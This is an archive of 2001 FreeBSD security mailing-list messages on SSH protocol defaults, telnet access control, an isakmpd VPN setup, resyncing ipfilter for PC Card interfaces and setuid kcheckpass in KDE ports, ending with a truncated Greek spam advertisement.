(8.11.6/8.11.3) id f9NKVIB05320; Tue, 23 Oct 2001 13:31:18 -0700 (PDT) (envelope-from cjc) Date: Tue, 23 Oct 2001 13:31:17 -0700 From: "Crist J. Clark" To: Krzysztof Parzyszek Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH default protocol Message-ID: <20011023133117.A4472@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20011023081729.A10955@warsaw.scl.ameslab.gov> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011023081729.A10955@warsaw.scl.ameslab.gov>; from kparz@iastate.edu on Tue, Oct 23, 2001 at 08:17:29AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Oct 23, 2001 at 08:17:29AM -0500, Krzysztof Parzyszek wrote: > I noticed some time ago that in ssh_config, the Protocol field > is now `1, 2' instead of `2, 1' as it used to be. > Does anyone know why this has changed? I don't believe it ever was '2,1' in -STABLE. Some people may be misled by the fact that in the past there was a line like, # Protocol 2,1 In /etc/ssh/ssh_config. Notice it is commented out. ssh(1) still used protocol 1 by default. That is, the default was 'Protocol 1,2'. Changing it in -STABLE is considered too disruptive. Just imagine the flood of mail on this list if the change were to be made. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 14: 8: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from warsaw.scl.ameslab.gov (warsaw.scl.ameslab.gov [147.155.137.63]) by hub.freebsd.org (Postfix) with ESMTP id D6F8A37B403 for ; Tue, 23 Oct 2001 14:08:00 -0700 (PDT) Received: (from kparz@localhost) by warsaw.scl.ameslab.gov (8.11.6/8.11.6) id f9NL8uT12215; Tue, 23 Oct 2001 16:08:56 -0500 (CDT) (envelope-from kparz) Date: Tue, 23 Oct 2001 16:08:56 -0500 From: Krzysztof Parzyszek To: cjclark@alum.mit.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH default protocol Message-ID: <20011023160856.A12153@warsaw.scl.ameslab.gov> References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <20011023133117.A4472@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011023133117.A4472@blossom.cjclark.org>; from cristjc@earthlink.net on Tue, Oct 23, 2001 at 01:31:17PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Oct 23, 2001 at 01:31:17PM -0700, Crist J. Clark wrote: > > I don't believe it ever was '2,1' in -STABLE. Some people may be > misled by the fact that in the past there was a line like, > > # Protocol 2,1 > > In /etc/ssh/ssh_config. Notice it is commented out. ssh(1) still used > protocol 1 by default. That is, the default was 'Protocol 1,2'. Yes, now I think it's true... Especially because the files in ~/.ssh didn't have '2' at the end of their names (i.e. known_hosts, instead of known_hosts2, etc.) -- ,oOo.Bc -=EE Krzysztof Parzyszek 10/12/2001 2:59pm -'7' `L' ---If this sentence is true, then every sentence is true. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 16:10:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210]) by hub.freebsd.org (Postfix) with ESMTP id 5E3B537B405; Tue, 23 Oct 2001 16:10:39 -0700 (PDT) Received: from kpi.com.au (localhost.kpi.com.au [127.0.0.1]) by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id KAA04618; Wed, 24 Oct 2001 10:16:57 +1100 (EST) (envelope-from johnsa@kpi.com.au) Message-ID: <3BD5F875.1781EDD6@kpi.com.au> Date: Wed, 24 Oct 2001 10:08:37 +1100 From: Andrew Johns X-Mailer: Mozilla 4.7 [en-gb] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Igor Roshchin Cc: ghelmer@palisadesys.com, scanner@jurai.net, will@physics.purdue.edu, kde@FreeBSD.ORG, ports@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: your mail References: <200110230458.f9N4wCX13835@giganda.komkon.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Igor Roshchin wrote: > > > From owner-freebsd-security@FreeBSD.ORG Fri Oct 19 13:33:02 2001 > > From: "Guy Helmer" > > To: "Will Andrews" , > > Cc: , , > > Subject: RE: your mail > > Date: Fri, 19 Oct 2001 12:36:15 -0500 > > > > > On Friday, October 19, 2001 12:16 PM, Will Andrews wrote: > > > On Fri, Oct 19, 2001 at 01:15:31PM -0400, scanner@jurai.net wrote: > > > > I think the actual problem isn't so much the message per se, > > > its the fact > > > > its placed in the wrong place. It should be shown at the *end* of the > > > > build instead of during the building of kdebase. When you go to > > > build the > > > > metaport of KDE2 no one wants to sit there watching the output for 12 > > > > hours while it builds. They want to come back and see the familiar > > > > "everything built ok" and then install it. If you place it as > > > the message > > > > at the end of the build *alot* more people would see the > > > > message. Otherwise no one is going to catch it. Just my $.02. > > > > > > Yeah, I'm aware of that. Unfortunately, there is nothing I can > > > do about that, because people might be invoking the kdebase port > > > from anywhere. So it's a general ports problem. :\ > > > > How about sending an email message to "root" with this message? It solves > > the problem of the message scrolling by during the installation... > > > > I don't think I'd always want to have an e-mail message sent to root or > to the building user. Probably, it can be an option, but not a default one. > > Talking about "general ports problem": > script(1) is a good solution in this situation. > It allows one to record all output, including warnings and such. > I like that idea of using script, as long as ports/packages fed out something useful to grep for. ie:a standard error message that wouldn't get mixed up with everything else or confused with real files (error.c, error.conf?) eg: script installation proceeds and appears to end successfully exit grep -i error scriptfile && mail -s "Errors during install" user,root < scriptfile Then you only get mail for errors, but it does rely on the error word appearing AND there are plenty of error.c, error_something.c files in the system. -- Andrew Johns ================================================================ BUGS:This utility is a prototype which lasted several years past its expiration date and is greatly in need of death. JKH - from FreeBSD sysinstall man page To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 2: 3:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from loverboy.highspeedweb.net (loverboy.highspeedweb.net [204.181.12.40]) by hub.freebsd.org (Postfix) with SMTP id F3B5B37B401 for ; Wed, 24 Oct 2001 02:03:08 -0700 (PDT) Received: (qmail 21142 invoked by uid 510); 24 Oct 2001 09:03:01 -0000 Received: from unknown (HELO padjajaran) (202.150.91.162) by progs4wealth.com with SMTP; 24 Oct 2001 09:03:01 -0000 Message-ID: <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> From: "Purwa Riadi" To: References: <20011023081729.A10955@warsaw.scl.ameslab.gov> Subject: telnet limitation Date: Wed, 24 Oct 2001 16:07:40 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dear FreeBSDer, If I wanna give rules in my server, therefore just certain IP that can telnet to my server, whats scripts that should I change and configure? Anyone can explain to me? thx & regards Purwa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 2:23:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from cerebellum.za.net (cerebellum.za.net [196.34.172.103]) by hub.freebsd.org (Postfix) with ESMTP id A973A37B401 for ; Wed, 24 Oct 2001 02:23:12 -0700 (PDT) Received: from berthome ([196.15.168.31]) by cerebellum.za.net (8.11.6/8.11.3) with SMTP id f9O9ITO51771; Wed, 24 Oct 2001 11:18:31 +0200 (SAST) (envelope-from creati0n@area.co.za) From: "Ian Barnes" To: "Purwa Riadi" Cc: Subject: RE: telnet limitation Date: Wed, 24 Oct 2001 11:19:57 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You must edit your hosts.allow config file in the /etc directory specifying who is allowed to use telnet. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Purwa Riadi Sent: 24 October 2001 11:08 To: freebsd-security@FreeBSD.ORG Subject: telnet limitation Dear FreeBSDer, If I wanna give rules in my server, therefore just certain IP that can telnet to my server, whats scripts that should I change and configure? Anyone can explain to me? thx & regards Purwa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 9:14: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from mk-smarthost-2.mail.uk.worldonline.com (mk-smarthost-2.mail.uk.worldonline.com [212.74.112.72]) by hub.freebsd.org (Postfix) with ESMTP id BDDB637B401 for ; Wed, 24 Oct 2001 09:13:56 -0700 (PDT) Received: from scooby-s1.lineone.net ([194.75.152.224] helo=lineone.net) by mk-smarthost-2.mail.uk.worldonline.com with smtp (Exim 3.22 #3) id 15wQfC-00031t-00 for freebsd-security@freebsd.org; Wed, 24 Oct 2001 17:13:54 +0100 To: freebsd-security@freebsd.org From: tariq_rashid@lineone.net Subject: 2-channel isakmpd on freebsd4.4R? Message-Id: Date: Wed, 24 Oct 2001 17:13:54 +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org first: let me apologise for thanking those who gave useful advice and help last week - i was away unexpectedly. ok - consider the following: [ isakmpd ] 192.168.1.1 ------- 192.168.1.2 [ isakmpd ] [ vpn H ] [ vpn A ] | | | 10.0.7.2 10.8.0.1 | | | | | { 10.0.0.0/16 subnet } { 10.8.0.0/16 subnet } *- in fact there are more than one subnets connected to "H" these are A, B, C etc ... these all have dynamic public IPs (so 192.168.1.2 may change) - only "H" 192.168.1.1 is static *- configuration uses pre-shared secrets, aggresive mode USER_FQDN etc etc this is fine (thanks to people on this list) Communication from any subnet to any subnet works fine. This is done by using multiple Connections= (spoke) and Passive-connections= (hub) tags... eg spoke: Connections= IPsec-A-H IPsec-A-B eg hub: Passive-Connections= IPsec-H-A IPsec-H-B IPsec-A-B IPsec-B-A However, comminication initiated from the vpn-endpoint boxes themselves does not work. ( I suspect that despite the packets being formed with source=external-ip, the ipsec "trap" doesn't catch them). Solution tried: MORE Connections were tried. In addition to the IPV4_ADDR_SUBNET endpoints, non-subnet IPV4_ADDR was tried. This failed. (This fails on its own too???) The UGLY solution which works is to use NATd: something like ... ipfw delete 50; ipfw add 50 divert natd all from any to 10.8.0.0/16 via rl0; natd -v -n fxp0 Keep in mind that isakmpd.conf can't be over-specified due to the need for the spoke-nets requiring dynamic public IPs. Any better ideas? much appreciated! tariq To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 11:28:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mighty.grot.org (mighty.grot.org [216.15.97.5]) by hub.freebsd.org (Postfix) with ESMTP id 9B17A37B406; Wed, 24 Oct 2001 11:28:19 -0700 (PDT) Received: by mighty.grot.org (Postfix, from userid 515) id 4ED785E04; Wed, 24 Oct 2001 11:28:19 -0700 (PDT) Date: Wed, 24 Oct 2001 11:28:19 -0700 From: "R.P. Aditya" To: freebsd-security@freebsd.org Cc: freebsd-mobile@freebsd.org Subject: ipfilter resync on pccard_ether insertions? Message-ID: <20011024112819.A27379@mighty.grot.org> Reply-To: "R.P. Aditya" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-PGP-Key: http://www.grot.org/pubkey.asc X-PGP-Key-ID: 0x6405D8D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, AFAIK, any time a new interface is added, ipfilter needs to be "resynced" with an "ipf -y": -y Manually resync the in-kernel interface list main- tained by IP Filter with the current interface sta- tus list. to facilitate this for pccard interfaces, I made some local changes to /etc/defaults/rc.conf and /etc/pccard_ether; do these changes look reasonable? Can someone recommend a better approach? (My ipf.rules protect the entire box regardless of interface so it seems to work fine) If not, any objections to commiting this?: diff -r1.1 /etc/defaults/rc.conf 62c62 < ipfilter_program="/sbin/ipf -Fa -f" --- > ipfilter_program="/sbin/ipf" 67c67 < ipfilter_flags="-E" # should be *empty* when ipf is _not_ a module --- > ipfilter_flags=" -Fa -f" # should be *empty* when ipf is _not_ a module and: diff -r1.1 /etc/pccard_ether 9a10,15 > if [ -x /usr/bin/logger ]; then > LOGGER="/usr/bin/logger -s -p user.notice -t pccard_ether" > else > LOGGER=echo > fi > 29a36,45 > > #resync ipf if we bring up a new interface > if /sbin/ipfstat -i > /dev/null 2>&1; then > case "${ipfilter_enable}" in > [Yy][Ee][Ss]) > ${ipfilter_program:-/sbin/ipf} -y > $LOGGER "Resyncing ipf to use new interface" > ;; > esac > fi 31c47 < echo "${dhcp_program}: DHCP client software not available" --- > $LOGGER "${dhcp_program}: DHCP client software not available" Thanks, Adi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 16:14:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com (ool-18bd6caa.dyn.optonline.net [24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 0238F37B403 for ; Wed, 24 Oct 2001 16:14:46 -0700 (PDT) Received: (qmail 52449 invoked from network); 24 Oct 2001 23:06:15 -0000 Received: from 21.mumf.nyrk.nycenycp.dsl.att.net (HELO quadtelecom.com) (63.242.250.21) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 24 Oct 2001 23:06:15 -0000 Message-ID: <3BD74962.9900EF9F@quadtelecom.com> Date: Wed, 24 Oct 2001 19:06:10 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Frank Tobin Cc: Will Andrews , security@FreeBSD.ORG Subject: Re: KCheckPass -- make it setuid root or not? References: <20011019133826.O4565-100000@palanthas.neverending.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A modest suggestion! Warning messages during make() which explain why an expected feature won't work, do not necessarily reach the intended audience. For instance, some people build their systems from binaries. Therefore one of the following decisions need to be made: a) setuid executables are a necessary evil, and therefore kcheckpass is built setuid. b) setuid executables are absolutely evil, remove kcheckpass and programs that depend on it. c) fence straddle. Leave it to the user, but modify kscreensaver so that it will not lock the the system unless kcheckpass can unlock the screen! Display a GUI message explaining the problem when this occurs. - Harry Tabak Quad Telecom, Inc. Frank Tobin wrote: > > Will Andrews, at 12:07 -0500 on 2001-10-19, wrote: > > OK, so I keep getting mail every now and then from people who can't > figure out why kcheckpass / kscreensaver won't authenticate their > password(s). It's because I decided to play it safe and made > kcheckpass non setuid root, which it needs in order to call > getpwnam(). > > Why would you choose to make it non setuid root? Isn't the warning that > is associated with all setuid-installed programs enough? Not installing > it setuid-root would be like installing sudo without setuid; it's > pointless without the bit set. > > You can't count on the warning messages to get to the user; if someone > goes to ports/x11/kde2, and does "make install", the message is going to > be buried in the middle of compiling kdelibs, kdebase, kdemultimedia, > kdenetwork, etc. > > -- > Frank Tobin http://www.neverending.org/~ftobin/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 21:31:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from zeus.marinet.gr (www.marinet.gr [62.1.205.9]) by hub.freebsd.org (Postfix) with ESMTP id 5D6EF37B405; Wed, 24 Oct 2001 21:23:19 -0700 (PDT) Received: from athena ([62.1.154.6]) by zeus.marinet.gr (8.9.3/8.9.3) with SMTP id VAA06905 for ; Wed, 24 Oct 2001 21:05:36 +0300 Message-ID: <001001c15cbc$49e2ec60$120152a6@marinet.gr> From: "Sotiria Petrou" To: Subject: =?iso-8859-7?B?TWFyaW5ldCAtINDRz9PUwdTF2NTFINTPIMPRwdbFyc8g08HTIME=?= =?iso-8859-7?B?0M8g1M/V0yDJz9XTIA==?= Date: Wed, 24 Oct 2001 21:42:50 +0300 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_000A_01C15CD4.D549F2E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_000A_01C15CD4.D549F2E0 Content-Type: multipart/alternative; boundary="----=_NextPart_001_000B_01C15CD4.D549F2E0" ------=_NextPart_001_000B_01C15CD4.D549F2E0 Content-Type: text/plain; charset="iso-8859-7" Content-Transfer-Encoding: quoted-printable MARINET - =D0=F1=EF=F3=F6=EF=F1=DC Antivirus =20 =D0=D1=CF=D3=D4=C1=D4=C5=D8=D4=C5 =D4=CF = =C3=D1=C1=D6=C5=C9=CF =D3=C1=D3 =C1=D0=CF =D4=CF=D5=D3 =C9=CF=D5=D3=20 =C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 =E1=F0=FC = =F4=E5=F7=ED=E9=EA=EF=FD=F2 =EC=E1=F2=20 =C4=E9=E1=F1=EA=DE=F2 = =D5=F0=EF=F3=F4=DE=F1=E9=EE=E7 & =C1=ED=E1=ED=DD=F9=F3=E7 =D0=D1=CF=D3=D6=CF=D1=C1 10.000 =C4=D1=D7=20 =20 =20 =20 =D0=F1=EF=F3=F4=E1=F4=DD=F8=F4=E5 =F4=E1 = =DD=E3=E3=F1=E1=F6=DC =F3=E1=F2 =E1=F0=FC =F4=EF=F5=F2 =E9=EF=FD=F2: =20 =20 Symantec Norton Antivirus 2002 - 9.800 =E4=F1=F7 Symantec Systemworks 2001 - 17.000 =E4=F1=F7=20 McAffee Virusscan - 9.600 =E4=F1=F7 McAffee Office 2001 - 35.000 =E4=F1=F7 =C1=ED=E1=ED=DD=F9=F3=E7 = =E2=E9=E2=EB=E9=EF=E8=E7=EA=FE=ED =E9=FE=ED - 10.000 =E4=F1=F7 =C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 =E1=F0=FC = =F4=E5=F7=ED=E9=EA=FC =EC=E1=F2 - 10.000 =E4=F1=F7=20 =D0=E1=F1=DD=F7=EF=F5=EC=E5 = =F3=F5=EC=E2=FC=EB=E1=E9=E1 =E4=E9=E1=F1=EA=EF=FD=F2 = =F5=F0=EF=F3=F4=DE=F1=E9=EE=E7=F2. =20 =20 =20 *=CF=E9 =F4=E9=EC=DD=F2 =E4=E5=ED = =F0=E5=F1=E9=EB=E1=EC=E2=DC=ED=EF=F5=ED =D6=D0=C1 18%=20 =20 =20 =20 =20 =D5=F0=E5=FD=E8=F5=ED=EF=F2 =D0=F9=EB=DE=F3=E5=F9=ED =CD=E9=EA=FC=EB=E1=EF=F2 =CC=F0=EF=F3=DF=ED=E7=F2 =F4=E7=EB.: 4101130,1 fax: 4101132 e-mail: sales@marinet.gr =20 =20 =D3=F5=EC=F0=EB=E7=F1=FE=F3=F4=E5 =F4=E1 = =F3=F4=EF=E9=F7=E5=DF=E1 =E3=E9=E1 =F0=EB=E7=F1=EF=F6=EF=F1=DF=E5=F2:=20 =C5=F4=E1=E9=F1=E5=DF=E1: =20 =BC=ED=EF=EC=E1 (=F5=F0=E5=F5=E8=FD=ED=EF=F5): =20 =CF=E4=FC=F2, =E1=F1=E9=E8=EC=EF=F2: =20 =D0=FC=EB=E7: =20 =D4.=CA. =20 =D4=E7=EB=DD=F6=F9=ED=EF: =20 FAX: =20 E-mail: =20 =20 =C5=ED=E4=E9=E1=F6=E5=F1=FC=EC=E1=F3=F4=E5 =E3=E9=E1 = =F4=E1 =F0=E1=F1=E1=EA=DC=F4=F9 =F0=E1=EA=DD=F4=E1: =20 Symantec Norton Antivirus 2002 -9.000 = =E4=F1=F7: =20 McAffee Virusscan - 9.000 =E4=F1=F7: =20 =D3=F5=ED=E4=F1=EF=EC=DE Internet PSTN: 3 = =EC=E7=ED=E7 6=EC=E7=ED=E7 12=EC=E7=ED=E7 =20 =D3=F5=ED=E4=F1=EF=EC=DE Internet ISDN = 64K: 3 =EC=E7=ED=E7 6=EC=E7=ED=E7 12=EC=E7=ED=E7 =20 =D3=F5=ED=E4=F1=EF=EC=DE Internet ISDN = 128K: 3 =EC=E7=ED=E7 6=EC=E7=ED=E7 12=EC=E7=ED=E7 =20 =CF=EB=EF=EA=EB=E7=F1=F9=EC=DD=ED=E5=F2 = =CB=FD=F3=E5=E9=F2 =CC=E7=F7=E1=ED=EF=E3=F1=DC=F6=E7=F3=E7=F2 : =20 =D5=F0=E7=F1=E5=F3=DF=E5=F2 Internet = (=E9=F3=F4=EF=F3=E5=EB=DF=E4=E5=F2, e-shop, webhosting) : =20 =C5=EC=F0=EF=F1=E9=EA=DD=F2 = =C5=F6=E1=F1=EC=EF=E3=DD=F2 : =20 =C1=EC=F6=DF=E4=F1=EF=EC=EF = =E4=EF=F1=F5=F6=EF=F1=E9=EA=FC Internet: =20 =C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 & = =F3=F5=ED=F4=DE=F1=E7=F3=E7 =F4=EF=F0=E9=EA=EF=FD =E4=E9=EA=F4=FD=EF=F5 = : =20 =CC=FC=ED=E9=EC=E5=F2 = =EC=E9=F3=E8=F9=EC=DD=ED=E5=F2 =E3=F1=E1=EC=EC=DD=F2 : =20 =CC=E5=DF=F9=F3=E7 = =F4=E7=EB=E5=F0=E9=EA=EF=E9=ED=F9=ED=E9=E1=EA=EF=FD = =EA=FC=F3=F4=EF=F5=F2 =F5=F0=E5=F1=E1=F3=F4=E9=EA=FE=ED = =EA=EB=DE=F3=E5=F9=ED : =20 =20 =20 =CB=E5=F0=F4=EF=EC=DD=F1=E5=E9=E5=F2:=20 =20 =20 =20 =20 =20 =C1=ED =E4=E5=ED =E5=F0=E9=E8=F5=EC=E5=DF=F4=E5 =ED=E1 = =EB=DC=E2=E5=F4=E5 =EE=E1=ED=DC =EA=DC=F0=EF=E9=E1 = =F0=F1=EF=F3=F6=EF=F1=DC =EC=E5 e-mail =E1=F0=FC =F4=E7=ED = =E5=F4=E1=E9=F1=DF=E1 =EC=E1=F2=20 =F0=E1=F1=E1=EA=E1=EB=FE =F0=E1=F4=DE=F3=F4=E5 =F4=EF = =F0=E1=F1=E1=EA=DC=F4=F9 =EA=EF=F5=EC=F0=DF. =20 =20 =20 =D5=F0=EF=F5=F1=E3=E5=DF=EF = =C1=ED=DC=F0=F4=F5=EE=E7=F2 - =D0=F1=FC=E3=F1=E1=EC=EC=E1 = =C4=E9=EA=F4=F5=F9=E8=E5=DF=F4=E5=20 10.000 =E5=F0=E9=F7=E5=E9=F1=DE=F3=E5=E9=F2 = =E1=EE=E9=EF=F0=EF=DF=E7=F3=E1=ED =DE=E4=E7 =F4=EF = =F0=F1=FC=E3=F1=E1=EC=EC=E1=20 =E3=E9=E1 =F4=E7=ED =F0=F1=EF=EC=DE=E8=E5=E9=E1 = =E7=EB=E5=F4=F1=EF=ED=E9=EA=EF=FD =E5=EE=EF=F0=EB=E9=F3=EC=EF=FD = =EA=E1=E9 =F5=F0=E7=F1=E5=F3=E9=FE=ED. =20 OTE : =CC=E5=DF=F9=F3=E7 =F4=EF=F5 =F0=DC=E3=E9=EF=F5 = =F4=DD=EB=EF=F5=F2 ISDN =E1=F0=FC 6.000 =E4=F1=F7/=EC=DE=ED=E1 =F3=E5 = 4.500 =E4=F1=F7/=EC=DE=ED=E1 =20 Marinet =C1=EB=E9=F0=DD=E4=EF=F5 18, 18531 = =D0=E5=E9=F1=E1=E9=DC=F2 =D4=E7=EB 01 4101130,1 Fax 014101132 sales@marinet.gr=20 =20 =20 =20 ------=_NextPart_001_000B_01C15CD4.D549F2E0 Content-Type: text/html; charset="iso-8859-7" Content-Transfer-Encoding: quoted-printable MARINET - =D0=F1=EF=F3=F6=EF=F1=DC Router Zyxel = Prestige
 

=D0=D1=CF=D3=D4=C1=D4=C5=D8=D4=C5 =D4=CF = =C3=D1=C1=D6=C5=C9=CF =D3=C1=D3 =C1=D0=CF =D4=CF=D5=D3=20 =C9=CF=D5=D3 =
=C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 =E1=F0=FC = =F4=E5=F7=ED=E9=EA=EF=FD=F2=20 =EC=E1=F2
=C4=E9=E1=F1=EA=DE=F2 = =D5=F0=EF=F3=F4=DE=F1=E9=EE=E7 &=20 =C1=ED=E1=ED=DD=F9=F3=E7
=D0=D1=CF=D3=D6=CF=D1=C1 = 10.000 =C4=D1=D7=20

=D0=F1=EF=F3=F4=E1=F4=DD=F8=F4=E5 =F4=E1 = =DD=E3=E3=F1=E1=F6=DC =F3=E1=F2 =E1=F0=FC =F4=EF=F5=F2=20 =E9=EF=FD=F2:

Symantec Norton Antivirus 2002 - 9.800=20 =E4=F1=F7
Symantec Systemworks 2001 - 17.000 = =E4=F1=F7=20
McAffee Virusscan - 9.600 = =E4=F1=F7
McAffee Office 2001=20 - 35.000 =E4=F1=F7
=C1=ED=E1=ED=DD=F9=F3=E7 = =E2=E9=E2=EB=E9=EF=E8=E7=EA=FE=ED =E9=FE=ED - 10.000=20 =E4=F1=F7
=C5=E3=EA=E1=F4=DC=F3=F4=E1=F3=E7 = =E1=F0=FC =F4=E5=F7=ED=E9=EA=FC =EC=E1=F2 - 10.000 =E4=F1=F7

=D0=E1=F1=DD=F7=EF=F5=EC=E5 =F3=F5=EC=E2=FC=EB=E1=E9=E1 = =E4=E9=E1=F1=EA=EF=FD=F2=20 = =F5=F0=EF=F3=F4=DE=F1=E9=EE=E7=F2.

*=CF=E9 =F4=E9=EC=DD=F2 =E4=E5=ED = =F0=E5=F1=E9=EB=E1=EC=E2=DC=ED=EF=F5=ED =D6=D0=C1 18%=20 =

 

=D5=F0=E5=FD=E8=F5=ED=EF=F2 = =D0=F9=EB=DE=F3=E5=F9=ED
=CD=E9=EA=FC=EB=E1=EF=F2=20 =CC=F0=EF=F3=DF=ED=E7=F2
=F4=E7=EB.: = 4101130,1
fax:=20 4101132
e-mail: sales@marinet.gr=20
=D3=F5=EC=F0=EB=E7=F1=FE=F3=F4=E5 =F4=E1=20 =F3=F4=EF=E9=F7=E5=DF=E1 =E3=E9=E1=20 = =F0=EB=E7=F1=EF=F6=EF=F1=DF=E5=F2:
=C5=F4=E1=E9=F1=E5=DF=E1: =  
=BC=ED=EF=EC=E1=20 (=F5=F0=E5=F5=E8=FD=ED=EF=F5):  
=CF=E4=FC=F2, =E1=F1=E9=E8=EC=EF=F2:=20  
=D0=FC=EB=E7:  
=D4.=CA.  
=D4=E7=EB=DD=F6=F9=ED=EF:  
FAX:  
E-mail: =  
     
=C5=ED=E4=E9=E1=F6=E5=F1=FC=EC=E1=F3=F4=E5 = =E3=E9=E1 =F4=E1 =F0=E1=F1=E1=EA=DC=F4=F9 =F0=E1=EA=DD=F4=E1:=20
Symantec Norton Antivirus 2002 = -9.000=20 =E4=F1=F7:
McAffee=20 Virusscan - 9.000 =E4=F1=F7:
=D3=F5=ED=E4=F1=EF=EC=DE Internet = PSTN: 3 =EC=E7=ED=E7=20 =20 6=EC=E7=ED=E7 =20 12=EC=E7=ED=E7 =20
=D3=F5=ED=E4=F1=EF=EC=DE Internet = ISDN 64K: 3 =EC=E7=ED=E7=20 6=EC=E7=ED=E7 12=EC=E7=ED=E7
=D3=F5=ED=E4=F1=EF=EC=DE Internet = ISDN 128K: 3 =EC=E7=ED=E7=20 6=EC=E7=ED=E7 12=EC=E7=ED=E7
